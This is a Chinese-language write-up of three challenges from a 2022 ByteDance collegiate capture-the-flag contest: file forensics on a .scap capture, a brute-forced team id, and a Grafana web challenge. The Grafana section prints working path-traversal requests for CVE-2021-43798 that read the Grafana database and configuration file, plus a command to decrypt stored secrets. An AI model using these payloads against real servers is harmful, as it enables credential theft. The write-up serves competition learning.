admin管理员组文章数量:1530013
目录
- 【题目附件】解压密码:123456
- 【Misc】find_it
- 【Misc】signin
- 【Web】easy_grafana
【题目附件】解压密码:123456
【Misc】find_it
下载的是一个.scap的文件,(把名字改短一点,就叫find_it.scap吧)
通过strings、zsteg也没发现什么正常的,于是试了一下binwalk
发现了很多东西
于是我习惯性的用foremost进行分解(本来是想用binwalk继续操作的)
于是偶然发现了三个png文件,其中一个是一个二维码
二维码扫描结果是flag的前半部分
接下来是找到后半部分flag
经过尝试,将find_it.scap转成可读文件类型进行分析
sysdig -r find_it.scap > findit.txt
打开文件后
搜索“}”,在125820行找到了bec5-d7563b2672b6}.php
结合前半段得到flag
ByteCTF{53f8fb16-a25d-4aac-bec5-d7563b2672b6}
【Misc】signin
这道题打开是这样的
在这里才能下一步
然后欣赏一下套路
接下来就是一堆游戏
最后就是我不知道队伍id,然后就是。。。。
大家可以注意看一下地址栏有个“final”
抓个包爆破一下id
然后得到flag
ByteCTF{Hop3_Y0u_hav3_fun!_30bed8ac}
【Web】easy_grafana
在百度中找“grafana漏洞”的时候发现有个任意文件读取漏洞CVE-2021-43798
根据提供的文章尝试复现,找到数据库,因为浏览器有解码,所以一部分进行url编码后进行利用,最后得出↓
/public/plugins/alertlist/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/lib/grafana/grafana.db
然后在返回的数据中找到了password的关键信息
然后找grafana的配置信息
/public/plugins/alertlist/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/grafana/grafana.ini
找到了secret_key
把数据库巴拉下来
./grafanaExp_linux_amd64 edcode -f easygrafana.db -k SW2YcwTIb9zpO1hoPsMm
ByteCTF{e292f361-285e-47fc-9210-b9cd233773cb}
版权声明:本文标题:[ CTF ] WriteUp-2022 College Security Competition Byte Capture The Flag(字节跳动安全范儿高校挑战赛) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/xitong/1726694205a1081017.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论